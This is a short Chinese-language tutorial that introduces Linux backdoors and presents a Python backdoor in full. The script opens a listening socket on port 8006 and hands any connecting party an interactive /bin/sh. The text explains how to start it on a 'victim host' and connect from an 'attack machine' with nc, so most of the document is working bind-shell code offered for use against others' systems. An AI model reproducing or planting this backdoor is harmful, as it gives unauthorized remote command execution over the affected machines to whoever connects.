linux 后门有很多,像bash后门,openssh后门等等,今天,我将带大家探讨一下python后门。python后门,其实就是用python编写的一个简单的socket服务器端。具体实现代码如下:
from socket import *
import subprocess
import os, threading, sys, time
if __name__ == "__main__":
server=socket(AF_INET,SOCK_STREAM)
server.bind(('0.0.0.0',8006))
server.listen(5)
talk, addr = server.accept()
proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk,
stdout=talk, stderr=talk, shell=True)
以上代码原理也很简单,创建套接字,绑定套接字(也就是之后开启的监听端口),监听套接字(其中数字5代表有5台设备可同时连接),将linux下的标准输入、输出、错误重定向到套接字中并开启一个shell,从而实现数据传输。在使用python启动脚本,并在攻击机上使用nc进行连接。成功连接后,受害者主机要显示建立了一个sh连接。